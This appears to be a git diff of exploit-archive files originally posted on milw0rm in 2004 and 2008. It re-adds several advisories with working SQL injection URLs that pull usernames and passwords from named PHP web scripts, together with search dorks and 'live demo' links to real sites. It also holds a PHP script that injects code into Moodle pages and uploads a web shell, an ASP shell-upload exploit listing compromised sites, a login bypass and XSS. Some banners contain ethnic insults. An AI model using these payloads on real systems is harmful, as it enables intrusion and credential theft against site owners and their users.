+additional filters were added, so it is not vulnerable to this attack. But
+version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL
+Injection attack is possible (without using spaces and brackets).
+
+############################################################
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/6348.txt b/platforms/php/webapps/6348.txt
index ea5fa17fc..813b40f52 100755
--- a/platforms/php/webapps/6348.txt
+++ b/platforms/php/webapps/6348.txt
@@ -1,57 +1,57 @@
-|___________________________________________________|
-|
-| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author:  Hussin X
-|
-|    Home :  WwW.Hussin-X.CoM  |  WwW.tryag.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.couponscript.com/
-|
-| DorK   :  inurl:couponsite/index.php?page=
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
-
-
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-|  
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
- 
-
-                       Im IRAQi
-
-# milw0rm.com [2008-09-02]
+|___________________________________________________|
+|
+| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author:  Hussin X
+|
+|    Home :  WwW.Hussin-X.CoM  |  WwW.tryag.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.couponscript.com/
+|
+| DorK   :  inurl:couponsite/index.php?page=
+|___________________________________________________|
+
+Exploit: 
+________
+
+
+
+www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
+
+
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+|  
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+ 
+
+                       Im IRAQi
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/6349.txt b/platforms/php/webapps/6349.txt
index ee57e8d63..dae358991 100755
--- a/platforms/php/webapps/6349.txt
+++ b/platforms/php/webapps/6349.txt
@@ -1,54 +1,54 @@
-|___________________________________________________|
-|
-| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.sourceworkshop.com/reciprocal_links_manager.html
-|
-| DorK   : "Powered by Reciprocal Links Manager"
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--
-
-
-
-L!VE DEMO:
-_________
-
-
-http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
-| 
-|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
-|______________________________________________________________________
- 
-
-                       Im IRAQi
-
-# milw0rm.com [2008-09-02]
+|___________________________________________________|
+|
+| Reciprocal Links Manager 1.1 (site) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.sourceworkshop.com/reciprocal_links_manager.html
+|
+| DorK   : "Powered by Reciprocal Links Manager"
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--
+
+
+
+L!VE DEMO:
+_________
+
+
+http://reciprocal.fastidev.com/index.php?command=open&site=-1+union+select+concat_ws(user(),version(),database())--
+
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum  WwW.Hussin-X.CoM | WwW.TrYaG.CC
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
+| 
+|    jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
+|______________________________________________________________________
+ 
+
+                       Im IRAQi
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/635.txt b/platforms/php/webapps/635.txt
index 49f77ec5f..37c0ca9af 100755
--- a/platforms/php/webapps/635.txt
+++ b/platforms/php/webapps/635.txt
@@ -1,5 +1,5 @@
 Example:
 
- http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* 
-
-# milw0rm.com [2004-11-16]
+ http://[target]/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from%20minibb_users/* 
+
+# milw0rm.com [2004-11-16]
diff --git a/platforms/php/webapps/6350.txt b/platforms/php/webapps/6350.txt
index 396e9b63c..9554b87f0 100755
--- a/platforms/php/webapps/6350.txt
+++ b/platforms/php/webapps/6350.txt
@@ -1,51 +1,51 @@
-#################################################################################################
-####################################  proud to be muslim   ######################################
-###                                                                                           ###
-###                            rEm0te sql injction VulnErability                              ###
-###                                                                                           ###
-###                                (ajhyip manager script)                                ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### AuTh0r : security fears team                                                              ###
-###                                                                                           ###
-### Home   : WwW.alsonaa.com                                                                  ###
-###                                                                                           ###    
-### members: HeB4RieH , germaya_x                                                             ###
-###                                                                                           ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### Script Name : ajhyip                                                                      ###
-###                                                                                           ###
-### download    : http://www.ajhyip.com/                                                      ###
-###                                                                                           ###
-### Email       : s-fteam@securityfears.cc                                                    ###
-#################################################################################################
-#################################################################################################
-###                                                                                           ###
-### d0rk ::  "use your mind"                                                                  ###
-### (you can log to control panel from http://site.com login.php)                             ###
-###                                                                                           ###
-### -(:: sql Code ::)-                                                                        ###
-###        comment.php?artid=(sql)                                                            ###
-###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/*    ###               
-###                                                                                           ###
-#################################################################################################
-###                                                                                           ###
-### -(::  l!ve demo ::)-                                                                      ###
-###                                                                                           ###
-###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
-###                                                                                           ###
-###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*              
-########################                                                    #####################
-########################                                                    #####################
-#################################################################################################
-#################################################################################################
-                                   -(:: !GreTzZ! ::)-
- ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs:: 
-#################################################################################################
-#################################################################################################
-
-# milw0rm.com [2008-09-02]
+#################################################################################################
+####################################  proud to be muslim   ######################################
+###                                                                                           ###
+###                            rEm0te sql injction VulnErability                              ###
+###                                                                                           ###
+###                                (ajhyip manager script)                                ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### AuTh0r : security fears team                                                              ###
+###                                                                                           ###
+### Home   : WwW.alsonaa.com                                                                  ###
+###                                                                                           ###    
+### members: HeB4RieH , germaya_x                                                             ###
+###                                                                                           ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### Script Name : ajhyip                                                                      ###
+###                                                                                           ###
+### download    : http://www.ajhyip.com/                                                      ###
+###                                                                                           ###
+### Email       : s-fteam@securityfears.cc                                                    ###
+#################################################################################################
+#################################################################################################
+###                                                                                           ###
+### d0rk ::  "use your mind"                                                                  ###
+### (you can log to control panel from http://site.com login.php)                             ###
+###                                                                                           ###
+### -(:: sql Code ::)-                                                                        ###
+###        comment.php?artid=(sql)                                                            ###
+###(sql)=5+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9+from+members/*    ###               
+###                                                                                           ###
+#################################################################################################
+###                                                                                           ###
+### -(::  l!ve demo ::)-                                                                      ###
+###                                                                                           ###
+###http://www.ajhyip.com/demo/prime/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*
+###                                                                                           ###
+###http://www.ajhyip.com/demo/acme/article/comment.php?artid=5+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9+from+members/*              
+########################                                                    #####################
+########################                                                    #####################
+#################################################################################################
+#################################################################################################
+                                   -(:: !GreTzZ! ::)-
+ ::SnIpEr.KiLLeR::fa6al error::black cheetah::members of alsonaa.com::str0ke::MusliMs HaCkErs:: 
+#################################################################################################
+#################################################################################################
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/6351.txt b/platforms/php/webapps/6351.txt
index 5c8d5f546..8ec055e49 100755
--- a/platforms/php/webapps/6351.txt
+++ b/platforms/php/webapps/6351.txt
@@ -1,71 +1,71 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection ++++++++++++++
-=======================================================
-
-
-<<->> script      : aj-hyip
-
-<<->> script site : www.ajhyip.com/demo/meridian                     
-                            : www.ajhyip.com/demo/acme
-                            : www.ajhyip.com/demo/prime
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>>>>>>>
-
-  for admin inf0 ::: 
-
-     >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,admin_password),5,6,7,8+from+admin/*                     
-
-
-  for members inf0 ::: 
-
-     >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8+from+members/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
-                                        anaconda-ksa $ sirus $ crazy-x $ br1ght-dark  $ colden-zero
-                    
-
-<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
-
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-09-02]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection ++++++++++++++
+=======================================================
+
+
+<<->> script      : aj-hyip
+
+<<->> script site : www.ajhyip.com/demo/meridian                     
+                            : www.ajhyip.com/demo/acme
+                            : www.ajhyip.com/demo/prime
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>>>>>>>
+
+  for admin inf0 ::: 
+
+     >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,admin_password),5,6,7,8+from+admin/*                     
+
+
+  for members inf0 ::: 
+
+     >>>> www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8+from+members/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
+                                        anaconda-ksa $ sirus $ crazy-x $ br1ght-dark  $ colden-zero
+                    
+
+<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
+
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-09-02]
diff --git a/platforms/php/webapps/6354.txt b/platforms/php/webapps/6354.txt
index ee19d757a..ef782565d 100755
--- a/platforms/php/webapps/6354.txt
+++ b/platforms/php/webapps/6354.txt
@@ -1,66 +1,66 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection ++++++++++++++
-=======================================================
-
-
-<<->> script      : Spice Classifieds
-
-<<->> script site : www.classifieds-scripts.com/spice                  
-
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/*
-
-
-
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
-                                        anaconda-ksa $ sirus $ crazy-x $ br1ght-dark  $ colden-zero
-                    
-
-<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
-
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-09-03]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection ++++++++++++++
+=======================================================
+
+
+<<->> script      : Spice Classifieds
+
+<<->> script site : www.classifieds-scripts.com/spice                  
+
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> www.site.me/patch/index.php?cat_path=-99999+union+select+0,user(),2,3/*
+
+
+
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->>  freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
+                                        anaconda-ksa $ sirus $ crazy-x $ br1ght-dark  $ colden-zero
+                    
+
+<<->> InjEctOr5 TeaM freinds  :: abo-najm $ Eng.Silent Night  $ spid3r-net $ hacker-b0y $ qalbhamad $ Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal
+
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6356.php b/platforms/php/webapps/6356.php
index f0558817f..1d0991998 100755
--- a/platforms/php/webapps/6356.php
+++ b/platforms/php/webapps/6356.php
@@ -1,55 +1,55 @@
- phpinfo.html
-		'.$argv[0].' "echo `set`"
-		'.$argv[0].' /full/local/path/to/file/for/upload/php_shell.php
-	';
-	exit;
-}
-$upload = false;
-if(file_exists($code) && is_file($code)) {
-	$upload = $code;
-	$code = 'move_uploaded_file($_FILES[file][tmp_name], basename($_FILES[file][name]))';
-}
-$code .= ';exit;';
-
-$injection_points = array(
-	'blocks/rss_client/block_rss_client_error.php' => array('error'),
-	'course/scales.php?id=1' => array('name', 'description'),
-	'help.php' => array('text'),
-	'login/confirm.php' => array('data', 's'),
-	'mod/chat/gui_basic/index.php?id=1' => array('message'),
-	'mod/forum/post.php' => array('name'),
-	'mod/glossary/approve.php?id=1' => array('hook'),
-	'mod/wiki/admin.php' => array('page'),
-);
-$file = array_rand($injection_points);
-$param = $injection_points[$file][array_rand($injection_points[$file])];
-$value = '';
-
-$post_data = array($param=>$value, 'cmd'=>$code);
-if($upload) {
-	echo "Check at:\n\t\t".$url.'/'.dirname($file).'/'.basename($upload)."\n";
-	$post_data["file"] = '@'.$upload;
-}
-
-$c = curl_init();
-curl_setopt($c, CURLOPT_URL, $url.'/'.$file);
-curl_setopt($c, CURLOPT_PROXY, $proxy);
-curl_setopt($c, CURLOPT_POST, true);
-curl_setopt($c, CURLOPT_POSTFIELDS, $post_data);
-curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
-curl_setopt($c, CURLOPT_HEADER, false);
-echo curl_exec($c);
-curl_close($c);
-?>
-
-# milw0rm.com [2008-09-03]
+ phpinfo.html
+		'.$argv[0].' "echo `set`"
+		'.$argv[0].' /full/local/path/to/file/for/upload/php_shell.php
+	';
+	exit;
+}
+$upload = false;
+if(file_exists($code) && is_file($code)) {
+	$upload = $code;
+	$code = 'move_uploaded_file($_FILES[file][tmp_name], basename($_FILES[file][name]))';
+}
+$code .= ';exit;';
+
+$injection_points = array(
+	'blocks/rss_client/block_rss_client_error.php' => array('error'),
+	'course/scales.php?id=1' => array('name', 'description'),
+	'help.php' => array('text'),
+	'login/confirm.php' => array('data', 's'),
+	'mod/chat/gui_basic/index.php?id=1' => array('message'),
+	'mod/forum/post.php' => array('name'),
+	'mod/glossary/approve.php?id=1' => array('hook'),
+	'mod/wiki/admin.php' => array('page'),
+);
+$file = array_rand($injection_points);
+$param = $injection_points[$file][array_rand($injection_points[$file])];
+$value = '';
+
+$post_data = array($param=>$value, 'cmd'=>$code);
+if($upload) {
+	echo "Check at:\n\t\t".$url.'/'.dirname($file).'/'.basename($upload)."\n";
+	$post_data["file"] = '@'.$upload;
+}
+
+$c = curl_init();
+curl_setopt($c, CURLOPT_URL, $url.'/'.$file);
+curl_setopt($c, CURLOPT_PROXY, $proxy);
+curl_setopt($c, CURLOPT_POST, true);
+curl_setopt($c, CURLOPT_POSTFIELDS, $post_data);
+curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($c, CURLOPT_HEADER, false);
+echo curl_exec($c);
+curl_close($c);
+?>
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6357.txt b/platforms/php/webapps/6357.txt
index 9dc7b5479..a7844236a 100755
--- a/platforms/php/webapps/6357.txt
+++ b/platforms/php/webapps/6357.txt
@@ -1,53 +1,53 @@
-##################################################################################################
-                                                                                                 #
-#-#  Discovered bay Alemin_Krali <<<<<<<<====                                                    #                                                                                                                           #                                                                                                                             #
-                                                                                                 #
-#-#  aspWebAlbum 3.2                                              #     #    ####   ##      ##   #
-                                                                 # #    #    #      # #    # #   #
-#-#  Script Download "http://www.fullrevolution.com"            #####   #    ###    #  #  #  #   #
-                                                               #     #  #    #      #   #    #   #
-#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )       #       # ###  ####   #        #   #
-                                                                                                 #
-#-#  HomePage  al3m.blogspot.com                                                                 #
-                                                                                                 #
-#-#  alemin@windowslive.com                                                                      #
-                                                                                                 #
-#-#  Dork ? : album.asp?pic= .jpg cat=                                                           #
-                                                                                                 #
-                                                                                                 #
-           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
-           #  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]          #              #  
-           ########################################################################              #                                                                                                                             #                                                                                                                             #
-http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!                    #
-                                                                                                 #
-and your shell adress:                                                                           #
-                                                                                                 #
-http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                 #
-                                                                                                 #
-                                                                                                 #
-ex:1                                                                                             #
-http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp           #
-                                                                                                 #
-ex:2                                                                                             #
-http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                 #
-Ablaze rally 9-24-06/pics/klasvayv.asp                                                           #
-                                                                                                 #
-           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
-           # 2-Admin Bypass     [AspWebAlbum 3.2]                                 #              #                            
-           ########################################################################              #                                                                                                                             #                                                                                                                             #
-                                                                                                 #
-http://site.com/path/album.asp?action=login                                                      #
-                                                                                                 #
-ASP/MS SQL Server login syntax                                                                   #
-                                                                                                 #
-Username:'or'                                                                                    #
-Password:anything                                                                                #
-                                                                                                 #
-           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
-           # 3-Xss Vulnerability  [AspWebAlbum 3.2]                               #              #                            
-           ########################################################################              #                                                                                                                             #                                                                                                                             #
-http://site.com/album/album.asp?action=summary&message=&from=login  #
-                                                                                                 #
-#################################################################################################
-
-# milw0rm.com [2008-09-03]
+##################################################################################################
+                                                                                                 #
+#-#  Discovered bay Alemin_Krali <<<<<<<<====                                                    #                                                                                                                           #                                                                                                                             #
+                                                                                                 #
+#-#  aspWebAlbum 3.2                                              #     #    ####   ##      ##   #
+                                                                 # #    #    #      # #    # #   #
+#-#  Script Download "http://www.fullrevolution.com"            #####   #    ###    #  #  #  #   #
+                                                               #     #  #    #      #   #    #   #
+#-#  aspWebAlbum 3.2 Single Site License  |  $60.00 : )       #       # ###  ####   #        #   #
+                                                                                                 #
+#-#  HomePage  al3m.blogspot.com                                                                 #
+                                                                                                 #
+#-#  alemin@windowslive.com                                                                      #
+                                                                                                 #
+#-#  Dork ? : album.asp?pic= .jpg cat=                                                           #
+                                                                                                 #
+                                                                                                 #
+           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
+           #  1-Arbitrary File Upload Exploit [AspWebAlbum All Versions]          #              #  
+           ########################################################################              #                                                                                                                             #                                                                                                                             #
+http://www.site.com/path/album.asp?action=uploadmedia&cat=Real Category Name!                    #
+                                                                                                 #
+and your shell adress:                                                                           #
+                                                                                                 #
+http://www.site.com/path/album/categories/Real Category Name!/pics/yourshell.asp                 #
+                                                                                                 #
+                                                                                                 #
+ex:1                                                                                             #
+http://www.assisteurope.net/album/categories/Beslan%202005/Memorials/pics/cyberspy.asp           #
+                                                                                                 #
+ex:2                                                                                             #
+http://peopleablaze.net/ClientData/1038/CustomApps/PhotoAlbum//album/categories/                 #
+Ablaze rally 9-24-06/pics/klasvayv.asp                                                           #
+                                                                                                 #
+           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
+           # 2-Admin Bypass     [AspWebAlbum 3.2]                                 #              #                            
+           ########################################################################              #                                                                                                                             #                                                                                                                             #
+                                                                                                 #
+http://site.com/path/album.asp?action=login                                                      #
+                                                                                                 #
+ASP/MS SQL Server login syntax                                                                   #
+                                                                                                 #
+Username:'or'                                                                                    #
+Password:anything                                                                                #
+                                                                                                 #
+           ########################################################################              #                                       #                                                                      #              #                                       #                                                                      #              #
+           # 3-Xss Vulnerability  [AspWebAlbum 3.2]                               #              #                            
+           ########################################################################              #                                                                                                                             #                                                                                                                             #
+http://site.com/album/album.asp?action=summary&message=&from=login  #
+                                                                                                 #
+#################################################################################################
+
+# milw0rm.com [2008-09-03]
diff --git a/platforms/php/webapps/6361.txt b/platforms/php/webapps/6361.txt
index b54b57a2b..cfcf8daf9 100755
--- a/platforms/php/webapps/6361.txt
+++ b/platforms/php/webapps/6361.txt
@@ -1,54 +1,54 @@
-|___________________________________________________|
-|
-|  Living Local (listtest.php r) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.Hussin-X.CoM  |  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.ezonescripts.com/scripts/sls/livinglocal.php
-|
